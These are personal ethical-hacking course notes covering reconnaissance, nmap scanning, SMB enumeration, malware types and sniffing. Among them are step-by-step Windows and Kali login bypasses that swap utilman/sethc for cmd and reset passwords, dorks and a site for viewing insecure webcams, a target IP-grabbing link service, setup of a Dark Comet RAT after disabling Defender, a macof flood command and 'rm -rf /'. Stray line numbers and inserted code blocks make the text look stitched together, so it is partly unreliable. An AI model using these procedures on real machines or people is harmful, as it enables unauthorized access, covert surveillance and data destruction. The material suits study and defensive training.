Jan 25, 2020, 12:04 PM
Foot Printing / Recon / Info Gathering

Foot printing: to learn as much as you can about a system or a website: its functionality, structure, services being used,
and other aspects of its security.
The process of accumulating data regarding a specific network environment for the purpose of revealing system vulnerabilities.


2 Types
Active v Passive

Passive Foot Printing: measures to collect info from publicly accessible sources.
Whatever information you collect here is already available publicly, out in the open. You just have to scrape it.


Active Foot Printing: requires the attacker to interact with or touch the device, network, or resource. Usually social engineering or human interaction.
It involves tasks that may be logged by the target's systems, so being stealthy is key.

Example:
Reviewing a company's website is an example of passive footprinting, whereas attempting to gain access to sensitive information through social engineering
is an example of active information gathering.

[[Social Eng. IMAGE]]

What types of information are we looking for?
During foot printing the types of information a hacker can gather are:
Domain name
IP addresses
Nameservers
Employee information
Phone numbers
E-mails
Job information

Why Footprint/Recon?
 To understand what is there to attack.
 Allows assessing the posture of the target: security methods and applications in use.
 This allows the attacker to focus on the most vulnerable part.
From where can we gather all this information:
 Social media,
 google,
 bing,
 duckduckgo
 baidu
 company website,
 competitive intel: competitor website,
 job portals
 dorks -- ghdb

Tracking employees' online activity.

Use multiple search engines because they rank pages differently and index differently, hence allowing you to see more information.

Home work: read about the google page ranking algorithm.


Time invested upfront will save time later.
Organise all the information that you have collected in writing somewhere.

Example: https://www.wsj.com/articles/fraudsters-use-ai-to-mimic-ceos-voice-in-unusual-cybercrime-case-11567157402

search: kevin mitnick and similar hackers

Let's Start Footprinting (Hands on)

How to find the IP address of a domain
 ping www.google.com
 Use this command in the Windows cmd prompt or on Linux and check for the IP address in the reply

Performing a Domain Name Lookup
 https://www.whois.com/whois

Reverse Domain Lookup: here you can find all the websites hosted on a shared server. Search using the IP address of the web app
 https://viewdns.info/reverseip/
 http://whois.domaintools.com
 https://hostingchecker.com/tools/reverse-ip-lookup/
 https://www.yougetsignal.com/tools/web-sites-on-web-server/

To find out info such as hosting company, country, region, and ISP
 https://www.ip2location.com/

To find out the range of allotted IP addresses we can use a regional internet registry (RIR)
 https://www.arin.net/


For email harvesting

theharvester -h
-h is for the help menu

theharvester -d tcs.com -b google



For cloning and copying a website
 https://www.httrack.com/ [available for Kali and Windows]
 This allows understanding the structure of the website locally
 black widow website cloner
 http://softbytelabs.com/wp/blackwidow/
 https://sitepuller.com/
 is a paid service
 https://websitedownloader.io
 again a paid service but you can view a preview

We can also find out the history of websites, how they looked way back in time
 http://web.archive.org
 We can see all the changes that have been made over the past few years

Google Dorking

Google Dorks (these are advanced search operators)
 intext:

 inurl:

 intitle:

 filetype:

example:
 finding open camera dorks
 inurl:/view.shtml
 http://camera.buffalotrace.com/view/view.shtml?id=55122&imagePath=/mjpg/video.mjpg&size=1
 inurl:view/view.shtml
 liveapplet
 inurl:view/index.shtml
 inurl:ViewerFrame?Mode=Refresh
 inurl:ViewerFrame?Mode=
https://www.insecam.org/en/bycountry/IN/
This is to view insecure cams and can be narrowed by country choice

Country Specific search
Sometimes your query gives hundreds of URLs. You can restrict your search by adding a country, a specialized URL or another term:
Add: site:in and your search is restricted to in (India).
Like: intitle:"live view" intitle:axis site:in
Other examples:
site:de (restricted to de (Germany))
site:be (restricted to be (Belgium))
site:com (restricted to com)
site:net (restricted to net)
and so on.

Camera Specific Search:
 Axis Cameras
indexFrame.html axis
intitle:"Live View / - AXIS"
intitle:"Live View / - AXIS 206M"
intitle:"Live View / - AXIS 210"

Canon Cameras
 sample/LvAppl/
MOBOTIX Cameras
 control/userimage.html
More info, and organised:
 http://johnbokma.com/mexit/2005/01/09/security-webcam-hunting.html
More information and dorks can be found here:
 http://members.upc.nl/a.horlings/doc-google.html

Exploit DB walkthrough

netcraft
https://toolbar.netcraft.com/site_report

CVE details search


Shodan.io
 utility for searching IoT devices / unprotected devices
https://www.youtube.com/watch?v=01dLzan9g0E

Online People Searching resources
 Some are better than others so try all:
 Pipl.com
 Retired free search as of June 12, 2019.
 For fetching information regarding any individual person.
 www.zabasearch.com
 www.truepeoplesearch.com

 http://whitepages.com/person
 http://peoplesearchnow.com
 http://anywho.com
 www.intelius.com
 http://spokeo.com
 http://emailhunter.co --> hunter.io

Social media sites like LinkedIn, Twitter, Facebook, Instagram [[ mostly a user reuses the same username for all ]]

To grab the User Agent and IP address of a target
 grabify
 https://grabify.link/

Browser plugins on the go
 *wappalyzer
 https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/?src=search
 *builtwith

inside the linux terminal
 # whatweb domainname.com

To know if they read your mail or not: Email Tracking

Whoreadme
Yesware
Hubspot
Bananatag
Getnotify
Readnotify
Msgtag
Didtheyreadit

 https://chrome.google.com/webstore/detail/email-tracking-for-gmail/ndnaehgpjlnokgebbaldlmgkapkpjkkb?hl=en

----------------------------------------------------------------------------------------------------
linux timeline

1. The Shell - Bash


The shell, or the terminal, is a really useful tool. Bash is the standard shell on most Linux distros.

Navigating
----------------------------------------------------------------------------------------------------
pwd - Print working directory

cd - Change directory

cd ~ - Change directory to your home directory

cd - - Go back to previous directory
Looking at files

ls - List files in directory

ls -la - show hidden files and details
Shows all the files and directories and their permission settings.

drwxrwxrwt 2 root root 4,0K ago 3 17:33 myfile
Here we have 10 characters at the beginning. The first one, d, shows that it is a directory.
The next nine letters are r for read, w for write and x for execute.
The first three belong to the owner,
the second three to the group,
and the last three to all users.
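As an added example (not part of the original notes), here is a small Python parser that applies the owner/group/others rule above to the mode field of `ls -la` output. The first sample line is the notes' own `myfile` line; the other sample lines are constructed. It also reports the two things a reviewer usually looks for in such a listing: world-writable entries and setuid binaries.

```python
# Added example (not from the original notes): parse the mode field of an
# `ls -la` line into owner/group/others permission triples.
from typing import Dict, List

# Constructed sample listing; the first line is the one shown in the notes.
SAMPLE_LS_OUTPUT = """\
drwxrwxrwt 2 root root 4,0K ago 3 17:33 myfile
-rw-r--r-- 1 alice alice  220 Aug  3 17:40 notes.txt
-rwxr-x--- 1 root  staff 8192 Aug  3 17:41 deploy.sh
-rwsr-xr-x 1 root  root  5000 Aug  3 17:42 suid_tool
"""

TYPE_NAMES = {"d": "directory", "-": "file", "l": "symlink"}

def parse_mode(mode: str) -> Dict[str, object]:
    """Split a 10-character mode string such as 'drwxr-x---' into its parts."""
    if len(mode) != 10:
        raise ValueError(f"expected 10 characters, got {mode!r}")
    triples = {}
    for who, chunk in zip(("owner", "group", "others"), (mode[1:4], mode[4:7], mode[7:10])):
        triples[who] = {
            "read": chunk[0] == "r",
            "write": chunk[1] == "w",
            # 's'/'t' in the execute slot mean setuid/setgid/sticky AND executable;
            # uppercase 'S'/'T' mean the special bit is set but execute is not.
            "execute": chunk[2] in "xst",
        }
    return {
        "type": TYPE_NAMES.get(mode[0], "other"),
        "perms": triples,
        "setuid": mode[3] in "sS",
        "setgid": mode[6] in "sS",
        "sticky": mode[9] in "tT",
        "world_writable": mode[8] == "w",
    }

def parse_ls(output: str) -> List[Dict[str, object]]:
    """Parse each long-listing line: mode, links, owner, group, size, date(3), name."""
    entries = []
    for line in output.splitlines():
        parts = line.split(maxsplit=8)
        if len(parts) < 9:
            continue
        info = parse_mode(parts[0])
        info["owner"] = parts[2]
        info["group"] = parts[3]
        info["name"] = parts[8]
        entries.append(info)
    return entries

def review_flags(entries: List[Dict[str, object]]) -> List[str]:
    """Names of entries worth a second look: world-writable or setuid."""
    return [str(e["name"]) for e in entries if e["world_writable"] or e["setuid"]]

if __name__ == "__main__":
    listing = parse_ls(SAMPLE_LS_OUTPUT)
    for e in listing:
        print(e["name"], e["type"], e["perms"])
    print("review:", review_flags(listing))
```

`parse_ls` splits on at most eight whitespace runs so that file names containing spaces survive; the locale-formatted size and month in the notes' line parse the same way as English output.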

ls flags

file - Show info about a file: what type of file it is, e.g. whether it is a binary or a text file.

cat - Output content of file.

touch - Create a new file.

cp - Copy

mkdir - Make directory.

# Make entire directory structure
mkdir -p new/thisonetoo/and/this/one

rm - Remove file

# Remove recursively with its content. Very dangerous command!

rm -rf ./directory
Watch the command destroy an entire machine: https://www.youtube.com/watch?v=D4fzInlyYQo
rm -rf /


rmdir - Remove empty directory
--------------------------------------------------------------
There are mainly three ways to find files on Linux: locate, and which
--------------------------------------------------------------------------------------------

locate filename
 needs its internal db to run fast

which filename
 outputs the file path

explainshell.com

--------------------------------------------------------------------------------------------
Scanning

Before port scanning we need to have knowledge of

How the TCP three-way handshake works
handshake explained here
[ref. 3 way handshake image]


TCP flags
SYN
ACK
RST
URG
FIN
PSH
[[ ec council tcp flags ]]

[[ref. image wireshark capture image ]]



Ping Sweep:

Tools for scanning
AngryIPscanner - available for both Linux and Windows

NMAP - tool used to identify the target server: OS, open ports, services, vulnerabilities of the individual server.


Ping to check basic connectivity
ping <iphere>
^C to exit

Ping sweep
to check for active devices in a network
sends an ICMP echo request
and waits for the ICMP reply
tools:
 angry ip scanner [[ ref. to image for tool utility ]] [[https://angryip.org/]]

 advanced ip scanner [http://www.radmin.com]
 visual ping tester - std. [ http://www.pingtester.net]
 nmap ping sweep
 -sP: tells nmap not to do a port scan after host discovery.
 nmap -sP <192.168.0.1-255>
 The flag -sn (No port scan) replaces the -sP you just tried


Nmap Scanning

nmap 192.123.12.1
= nmap -sS
[[by default a TCP SYN scan is run ]]

scanning leads to three possible results
port state
 open [[when SYN/ACK rcvd from target]]
 closed [[when RST rcvd from target ]]
 filtered [[when no response is rcvd from target ]]
Filtered
Nmap will attempt to resend the SYN packet if no response is received. If after several retransmissions no response is received,
the port is marked as filtered.

TCP SYN Scan [[ nmap -sS 192.168.12.2]] or [[ nmap 192.168.12.3]]

a.k.a. half-open scanning, stealth scan

SYN scan has long been called the stealth scan because it is subtler than the TCP connect scan,
because you don't open a full TCP connection.
The TCP SYN scan is the default scan that runs against the target machine. It is the fastest scan.
You can tweak it to make it even faster by using the -n option, which tells nmap to skip
DNS resolution.


◾◾ The source machine sends a SYN packet to port 80 on the destination machine.
◾◾ If the machine responds with a SYN/ACK packet, Nmap knows that the particular port is open on the target machine.
◾◾ The operating system then sends a RST (reset) packet in order to close the connection, since we already know that the port is open.
◾◾ However, if there is no response from the destination after sending the SYN packet, nmap knows that the port is filtered.
◾◾ If you send a SYN packet and the target machine sends a RST packet, then nmap knows that the port is closed.

TCP Connect Scan [[full handshake]] [[ nmap -sT <ipaddrhere> ]]

The TCP connect scan is similar to the SYN scan, with the slight difference that it completes the three-way handshake.
The TCP connect scan becomes the default scan if the SYN scan is not supported by the machine. A common reason for that could be that the machine is
not privileged to create its own raw packets.
◾◾ The source machine sends a SYN packet to port 80.
◾◾ The destination machine responds with a SYN/ACK.
◾◾ The source machine then sends an ACK packet to complete the three-way handshake.
◾◾ The source machine finally sends the RST packet in order to close the connection.

NULL, FIN, and XMAS Scans

NULL, FIN, and XMAS scans are similar to each other. The major advantage of using these scans
for a pentest is that many times they get past firewalls and IDS and can be really beneficial against
Unix-based OS.
2 disadvantages

1.) These scans do not work against Windows-based operating systems, because they send a reset packet regardless of whether the port is open or closed.
Why? Because Windows does not follow RFC 793.
2.) It cannot be exactly determined if the port is open or filtered. This leaves us to manually verify it with other scan types.


These scans exploit a loophole in RFC 793.
Page 65 of RFC 793 says that "if the
[destination] port state is CLOSED .... an incoming segment not containing a RST causes a RST to be sent in response."
Then the next page discusses packets sent to open ports without the SYN, RST, or ACK bits set, stating that: "you are unlikely to get here, but if you do, drop the segment, and return."

When scanning systems compliant with this RFC text, any packet not containing SYN, RST, or ACK bits will result in a returned RST if the port is closed and no response at all if the port is open. As long as none of those three bits are included, any combination of the other three (FIN, PSH, and URG) is OK.

NULL Scan [[ nmap -sN <targetiphere> ]]

A null scan is accomplished by sending no flags/bits inside the TCP header. If no response comes, it means that the port is open;
if a RST packet is received, it means that the port is closed or filtered. [[ refer to image in cheatsheet]]

FIN Scan [[ nmap -sF <targetiphere>]]

A FIN flag is used to close a currently open session. In a FIN scan the sender sends a FIN flag
to the target machine: if no response comes from the target machine, it means that the port is
open; if the target machine responds with a RST, it means that the port is closed.
[[refer to image ]]

XMAS Scan [[ nmap -sX <targetiphere> ]]

The XMAS scan sends a combination of FIN, URG, and PUSH flags to the destination. [Technically this combination of bits does not make any sense to the receiver.]
It lights the packet up just like a Christmas tree and that is why it is called an XMAS scan. It works
just like the FIN and null scans. If there is no response, the port is open; if the target machine
responds with a RST packet, the port is closed.

[[ refer to image ]]

UDP Scan [[ nmap -sU <targetiphere> ]]

TCP ACK Scan

TCP ACK + Port 6969
The TCP ACK scan is not used for port scanning purposes. It is commonly used to determine the firewall and ACL (access list) rules and whether the firewall
is able to keep track of the connections that are being made.
The way this works is that the source machine sends an acknowledge (ACK) packet instead of a SYN packet.
If the firewall is stateful, it knows that there was no SYN packet sent and will not allow the packet to reach the destination.
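The SYN, connect, NULL/FIN/XMAS and ACK rules described above are the same decision table nmap applies to each reply, so as an added example (not part of the original notes, and not nmap's code) here is that table written out in Python. Nothing is sent on the wire: a probe and its reply are plain flag values, so the same functions can be used to interpret scan traffic seen in a packet capture. The `rfc_compliant=False` switch models the Windows behaviour the notes mention (a RST for NULL/FIN/XMAS probes regardless of port state), and `stateful_firewall=True` models the firewall that drops every out-of-state segment; both are assumptions of this model, not measured behaviour.

```python
# Added example (not from the original notes): a model of how a scanner reads
# the reply to a single probe, following the rules the notes give for SYN,
# connect, NULL/FIN/XMAS and ACK scans and the RFC 793 text quoted above.
from typing import Optional, Tuple

# TCP flag bits as laid out in the TCP header.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Probe flags used by each scan type named in the notes.
SCAN_PROBES = {
    "syn": SYN,               # nmap -sS
    "connect": SYN,           # nmap -sT (then completes the handshake)
    "null": 0,                # nmap -sN
    "fin": FIN,               # nmap -sF
    "xmas": FIN | PSH | URG,  # nmap -sX
    "ack": ACK,               # nmap -sA
}

def host_reply(port_open: bool, probe: int, rfc_compliant: bool = True) -> Optional[int]:
    """Flags of the segment a host sends back to a probe on a port with no
    established connection; None means silence. rfc_compliant=False models the
    Windows behaviour from the notes: a RST for NULL/FIN/XMAS probes regardless
    of port state (an assumption of this model)."""
    if probe & RST:
        return None                    # a bare RST is never answered
    if not rfc_compliant and not probe & (SYN | RST | ACK):
        return RST
    if not port_open:
        return RST | ACK               # CLOSED: any non-RST segment gets a RST
    if probe & SYN:
        return SYN | ACK               # LISTEN + SYN: handshake proceeds
    if probe & ACK:
        return RST                     # LISTEN + ACK: reset
    return None                        # LISTEN, no SYN/RST/ACK: segment dropped

def classify(scan: str, reply: Optional[int]) -> str:
    """Port state a scanner infers from the (final, post-retransmission) reply."""
    has_rst = reply is not None and bool(reply & RST)
    if scan in ("syn", "connect"):
        if reply is not None and reply & SYN and reply & ACK:
            return "open"
        return "closed" if has_rst else "filtered"
    if scan == "ack":
        # An ACK scan never learns open/closed; it only tells whether a
        # stateful device is filtering out-of-state segments.
        return "unfiltered" if has_rst else "filtered"
    # null / fin / xmas: RST means closed, silence is open OR filtered.
    return "closed" if has_rst else "open|filtered"

def simulate(scan: str, port_open: bool, stateful_firewall: bool = False,
             rfc_compliant: bool = True) -> Tuple[Optional[int], str]:
    """One probe against a modelled host, optionally behind a stateful firewall
    that drops every segment not starting a connection (assumed behaviour)."""
    probe = SCAN_PROBES[scan]
    if stateful_firewall and not probe & SYN:
        reply = None                   # firewall drops the out-of-state segment
    else:
        reply = host_reply(port_open, probe, rfc_compliant)
    return reply, classify(scan, reply)

if __name__ == "__main__":
    for scan in SCAN_PROBES:
        for port_open in (True, False):
            reply, state = simulate(scan, port_open)
            print(f"{scan:8} open={port_open!s:5} reply={reply} -> {state}")
```

Running the table shows the second disadvantage from the notes directly: for the NULL, FIN and XMAS rows an open port and a filtered port produce the same silence, which is why those scans can only report `open|filtered`.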


IDLE Scan
a.k.a. Zombie Scan
The IDLE scan is a very effective and stealthy scanning technique. The idea behind the IDLE scan is to introduce a zombie to scan another host.
This technique is stealthy because the victim host receives packets from the zombie host and not the attacker host. In this way, the victim would not
be able to figure out where the scan originated.
However, there are some prerequisites for launching the idle scan, which are as follows:

1. Finding a good candidate whose IP ID sequence is incremental and recording its IP ID.
2. The host should be idle on the network.


NMAP Timing Technique

The timing technique is one of the best techniques to evade firewalls/IDS. The idea behind this
technique is to send the packets gradually, so they do not end up being detected by firewalls/IDS.
In nmap we can launch a timing scan by specifying the -T option followed by a number ranging
from 0 to 5. Increasing the value from T0 to T5 increases the speed of the scan.
[[refer to NMAP sans cheatsheet ]]
-T --> timing template
◾◾ T0 - Paranoid
◾◾ T1 - Sneaky
◾◾ T2 - Polite
◾◾ T3 - Normal
◾◾ T4 - Aggressive
◾◾ T5 - Insane


nmap.org --> nmap guide

ZENMAP [[ automated GUI version of nmap ]]

route -n [[to check your gateway]] [[linux]]

# netstat -an
 - to check open ports on your server

# netstat -ona
 - list of ports and PIDs (process ID)
Through Task Manager, terminate any PID for a port that is establishing unnecessary connections.



ENUMERATION
Enumeration:
> querying a system to gather info such as usernames, shares, blocks of IPs, services, routing tables, banners, DNS etc.
> analysing the system to determine attack vectors
> need to identify system attack points
> we create an active connection with the target

scan with nmap --> check for open ports --> and then enum
473
474◾◾ T0—Paranoid
475◾◾ T1—Sneaky
476◾◾ T2—Polite
477◾◾ T3—Normal
478◾◾ T4—Aggressive
479◾◾ T5—Insane


Banner Grabbing
 method of identifying the host or service to determine application s/w or version number.
 ways:
 nmap
 nmap -sV --script=banner <$ip>
 nmap -sV -Pn -p 80 --script=banner <ip>

 telnet <$ip> <$port>
 is going to output the version of the service

 telnet <hostname e.g. abcd.com> <port e.g. 80>

 nc -v <$ip> <$port>

dirb - directory bruteforcing
dirb http://192.168.21.21:8080/
by default uses the default wordlist, i.e. common.txt
dirb http://ip:port/ <$custom wordlist path>

NMAP OS fingerprinting
 -O OS fingerprinting
nmap -O <$ip>
nmap -A <$ip>
This option enables OS and version detection, script scanning, and a traceroute, thus supplying you with extended enumeration on the target

Using Nmap for enumeration

# nmap --script smb-os-discovery --open -p 139 $IP
script usage using *os*

some ports and protocols to know for enum.
Ports
53 tcp/udp DNS
135 tcp/udp RPC
137 tcp/udp netbios
139 tcp/udp netbios
445 tcp/udp SMB


nbtscan: demo on com80 / metasploitable
nbtscan -r <$ip range /24>

> NBTScan is a program for scanning IP networks for NetBIOS name information (similar to what the Windows nbtstat tool provides against single hosts).
> It sends a NetBIOS status query to each address in a supplied range and lists received information in human readable form.

Netdiscover - pre-installed in Kali
netdiscover --help
-i network interface: eth0, wlan0, wlan1 [[ ifconfig and check for interface ]]
-r range of IPs for your network
-l give a list of IPs from a file
-p passive mode - not sending anything, only sniffing

netdiscover -i eth0 -r <$iprange/24>
Netdiscover is a network address discovering tool.
How does it work? --> It's based on ARP packets: it sends ARP requests and sniffs for replies.
Discovering devices connected to our network (we can do the same with nmap as well)

SMB - what is SMB
The Server Message Block Protocol (SMB protocol) is a client-server communication protocol used for sharing access to files, printers, serial ports
and other resources on a network. It can also carry transaction protocols for interprocess communication.
Port: 445

[ smb versions and their corresponding os ]

o SMB1 - Windows 2000, XP and Windows 2003.
o SMB2 - Windows Vista SP1 and Windows 2008
o SMB2.1 - Windows 7 and Windows 2008 R2
o SMB3 - Windows 8 and Windows 2012.

smbmap:
SMBMap allows users to enumerate samba share drives across an entire domain: list share drives, drive permissions, share contents, upload/download functionality,
file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind and is intended to simplify searching for
potentially sensitive data across large networks.
smbmap -H <$ip>
smbmap -H <$ip> -d metasploitable -u <$uname msfadmin> -p <$paswrd msfadmin>

Smbclient
smbclient is a client that can 'talk' to an SMB/CIFS server. It offers an interface similar to that of the FTP program.
Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.

smbclient -L 192.168.1.102
> get a list of sharenames
smbclient //192.168.1.102/tmp
 ^sharename
ls
get filename.txt


netstat -antup
-a display all socket connections
-n numeric
-t for TCP ports
-u for UDP
-p process


SYSTEM HACKING




SAM file: Security Account Manager
is a DB that stores credentials and other account parameters such as passwords in hashed form.

file is located in:
c:\windows\system32\config\sam

Linux --> shadow file

/etc/shadow


windows 10 login bypass
--> osk.exe

--> utilman.exe

--> sethc.exe

Windows 7 OS login bypass
---------------------------------------
current passwd 1234
switch on the system, shut down abruptly
switch it on again --> select recovery method --> restore popup will appear, click cancel --> wait for new startup repair popup
--> click on down arrow in popup --> scroll down, select view offline report --> notepad will open --> click file --> open --> select filetype any -->
browse to c:/windows/system32/
look for file named utilman and rename it to utilman1
now search for the cmd executable and rename it to utilman
cancel everything and exit everything --> let windows reboot --> once the login screen comes --> tap on bottom left utility icon -->
cmd will pop up --> type following cmd to change passwd
whoami
net user [[ this is going to list all the users on the device ]]
net user "a/c name" *
press enter and then enter passwd here



Win 10 OS login bypass, current passwd 123456789
-------------------------------------------------------------
abruptly switch off win 2-3 times until repair options appear while booting

power on --> abrupt power off
again power on --> again power off

again power on [ now you will see diagnosing problem/repairing ]

let it boot

select advanced option --> troubleshoot --> advanced options --> system image recovery --> cancel --> next --> advanced --> install a driver --> ok -->

navigate to my computer first
navigate to C:/windows/system32/
look for file named utilman or sethc (both are going to work fine) and rename it to utilman1/sethc1
now search for the cmd executable and rename it to utilman
cancel everything and exit everything --> reboot

 once the login screen comes --> tap on bottom right utility icon (ease of access icon) -->
cmd will pop up --> type following cmd to change passwd
whoami
net user [[ this is going to list all the users on the device ]]
net user "a/c name" *
press enter and then enter passwd here
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

kali linux os login bypass
current password 123456

power on machine --> advanced linux gnu options -->

--> kali gnu/linux, with linux 4.19.0 kaliamd64 (recovery mode) [don't press enter ]

--> press e while selecting above --> scroll down using arrow and look for line starting with linux

--> replace ro with rw

--> and also add
--> at the end of same line

init=/bin/bash

--> press f10
--> whoami
--> passwd root
--> enter newpswd
--> reboot -f

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
stickykeys replacement
browse to windows\system32\sethc
rename this to sethc1
cmd
copy and paste cmd here only
refresh
rename the copy of cmd to
sethc
that's it
cancel everything
and restart the machine
once booted
press sticky key
5x shift
cmd will open
control userpasswords2
select admin
click reset passwrd
set passwd
-----------------


MALWARE THREAT
Malware
what is it?
mal + ware = malicious software

designed to infiltrate and damage computers without the user's consent.
the term malware encompasses all the different types of threats to your computer such as:
viruses, spyware, worms, trojans etc.

Purpose of Malware !!
why do we need malware? why were they created in the first place?
> to do things without the user's permission
> to steal files
> to steal stored passwords
> to hijack the computer
> to hijack core computing functions
> to monitor the activity of the user
> to delete sensitive personal data
> to encrypt sensitive data
> to extort money

Types of Malware:

1. Virus: vital information resources under siege
 disrupts the normal functionality of the computer

 they are generally masked with executable files (i.e. attached to exe files)
 the virus may exist on a system but will not be active or able to spread until a user runs or opens the malicious program.
 Normally, the host program keeps functioning after it is infected by the virus.
 although they cannot replicate themselves outside the network, they have the ability to replicate and attach themselves to other files locally
 Viruses spread when the software or document they are attached to is transferred from one computer to another using the network,
 a disk, file sharing, or infected email attachments.

2. Worm:
similar to viruses, replicates itself outside the n/w as well
self-replicating without a host program and spreads without any human interaction or directives from the malware authors.
worms are standalone software and do not require a host program or human help to propagate
A worm enters a computer through a vulnerability in the system and takes advantage of
file-transport or information-transport features on the system, allowing it to travel unaided

3. Trojan
malicious s/w represented as valid
> A Trojan is another type of malware named after the wooden horse that the Greeks used to infiltrate Troy.
> It is a harmful piece of software that looks legitimate. Users are typically tricked into loading and executing it on their systems.
> After it is activated, it can achieve any number of attacks on the host, from irritating the user (popping up windows or changing desktops)
 to damaging the host (deleting files, stealing data, or activating and spreading other malware, such as viruses).
> Trojans are also known to create backdoors to give malicious users access to the system.
> Unlike viruses and worms, Trojans do not reproduce by infecting other files nor do they self-replicate.
> Trojans must spread through user interaction such as opening an email attachment or downloading and running a file from the Internet.

4. Spyware
Software that aims to gather information about a person or organization without their knowledge, that may send such information to another entity without the consumer's consent,
 or that asserts control over a device without the consumer's knowledge.

5. Ransomware
kind of malware that is used to extort money by infecting the user.
it encrypts all the files on a user's system using a strong encryption algorithm, then demands a ransom to issue a decryption key to retrieve / decrypt the user's data.

6. Rootkit
Programs that hide the existence of malware by intercepting (i.e., "hooking") and modifying operating system API calls that supply system information.
Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, master boot record, or the system firmware.
 Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.
 Rootkits have been seen for Windows, Linux, and Mac OS X systems.

7. Keyloggers
special kind of spyware
The action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored.
Data can then be retrieved by the person operating the logging program. A keylogger can be either software or hardware
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


What are shells?
A shell can simply be described as a piece of code or program which can be used to gain code or command execution on a device (like servers, mobile phones, etc.).

Types of shells
1. Reverse shell
2. Bind shell

Reverse shell
A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, by using which code or command execution is achieved.

Figure 1: Reverse TCP shell


Bind shell
A bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection.
The attacker then connects to the victim machine's listener, which then leads to code or command execution on the server.

Figure 2: Bind TCP shell
There are a number of popular shell files. To name a few: Reverse TCP Meterpreter, C99 PHP web shell, JSP web shell, Netcat, etc.
 One thing which is common between all these shells is that they all communicate over the TCP protocol.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Creating Malware
RAT: Remote Administration Tool
Dark Comet Example





---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
disable windows defender
open dark comet
server module (create server) --> full editor
process mutex --> threads
n/w settings --> enter lhost lport here --> press add
this will open a socket on the attacker machine to listen for incoming connections
listen for connection

SNIFFING

sniffing a.k.a. wiretapping

the action of secretly listening to other people's conversations, extending the definition to computers and n/w

Sniffing is the process of monitoring and capturing all the packets passing through a given network using sniffing tools

sniffing can be done through h/w or s/w

h/w when sniffing very high speed n/w, e.g. 10Gbps

kinds of info we can gather through sniffing
*usernames
*passwords
*Replay
*Chat
*watch someone surf websites
*ftp/telnet


attack types
passive sniffing

hub: n/w device that shares a broadcast domain

tap: h/w that sits inline with the communication media and replicates the bits on the wire
hosts are not aware of this

[ref hub image ]


active sniffing
in layer 2 n/w
[ref switch image ]

switched n/w: by default you cannot receive the data in switching

manipulate the switch to get a copy

attacker poisons protocols to redirect traffic
attacks that you can do against a switched n/w

MITM techniques
{{

*MAC flood
*MAC duplication
*ARP spoof
*DHCP starvation

}}

Promiscuous mode tells the NIC not to discard frames
by default when a NIC receives a layer 2 frame it reads the dest. MAC address; if the dest. MAC is not yours the frame is discarded


860
861Protocols that provide usernames and passwords in cleartext
862
863Telnet
864POP
865SMTP
866FTP
867HTTP
868IMAP
869
870Hence Encryption is important
871
872MAC Flooding
873editing CAM table : mapping of mac address to physical ports
874
875CAM tables are finite : often 64k to 128k entries
876what happens when table is full : flooding occurs
877send 130k arp rqst and randomise source mac address [ cam table will be flooded ]
878once flooded switch will start broadcasting
879
880# macof -n 130000 -d 192.168.0.1
881-n for number of packets to send
882-d for switch ip address that you want to flood
883-e for target mac address
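To see why a full CAM table turns a switch into a hub, and what the usual defence (a per-port MAC limit, "port security") changes, here is a toy learning switch as an added example; it is not macof's or any vendor's code, and the capacity and limit numbers are assumptions chosen to keep the demo small.

```python
"""Added example (not from these notes): a toy learning switch with a bounded
CAM table and an optional per-port MAC limit (port security), to show why a
full table turns a switch into a hub and what the defensive setting changes.
Capacity and limit numbers are assumptions chosen to keep the demo small."""


class Switch:
    def __init__(self, ports, cam_capacity=8, max_macs_per_port=None):
        self.ports = list(ports)
        self.cam_capacity = cam_capacity        # real switches: ~64k-128k
        self.max_macs_per_port = max_macs_per_port
        self.cam = {}                           # mac -> port
        self.macs_on_port = {p: set() for p in self.ports}
        self.violations = 0                     # frames dropped by port security

    def _learn(self, port, src):
        """Record src on port. Returns False if port security drops the frame."""
        if src in self.cam:
            return True
        limit = self.max_macs_per_port
        if limit is not None and len(self.macs_on_port[port]) >= limit:
            self.violations += 1
            return False
        if len(self.cam) < self.cam_capacity:   # a full table learns nothing
            self.cam[src] = port
            self.macs_on_port[port].add(src)
        return True

    def forward(self, port_in, src, dst):
        """Return the ports the frame leaves on ([] if dropped)."""
        if not self._learn(port_in, src):
            return []
        if dst in self.cam:
            return [self.cam[dst]]
        # Unknown destination: flood out of every other port. Once the CAM is
        # full this happens for every new host, which is exactly what a
        # sniffer sitting on the flooding port is waiting for.
        return [p for p in self.ports if p != port_in]


def flood_demo(port_security):
    """Constructed scenario: 20 frames with random-looking source MACs arrive
    on port 1, then Alice (port 2) and Bob (port 3) exchange two frames.
    Returns (ports that receive Bob's reply to Alice, port-security drops)."""
    sw = Switch(ports=[1, 2, 3], cam_capacity=8,
                max_macs_per_port=2 if port_security else None)
    for i in range(20):
        sw.forward(1, f"02:00:00:00:00:{i:02x}", "ff:ff:ff:ff:ff:ff")
    alice, bob = "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:02"
    sw.forward(2, alice, bob)
    return sw.forward(3, bob, alice), sw.violations


if __name__ == "__main__":
    print("no port security:", flood_demo(False))   # reply also reaches port 1
    print("port security on:", flood_demo(True))    # reply reaches port 2 only
```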


MAC Spoofing
impersonating another user
Technitium MAC Address Changer for Windows is used to modify the MAC address of a NIC
https://technitium.com/tmac/

How Does It Work?

This software just writes a value into the Windows registry.
 When the network adapter device is enabled, Windows searches for the registry value 'NetworkAddress' in the key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\[ID of NIC e.g. 0001].
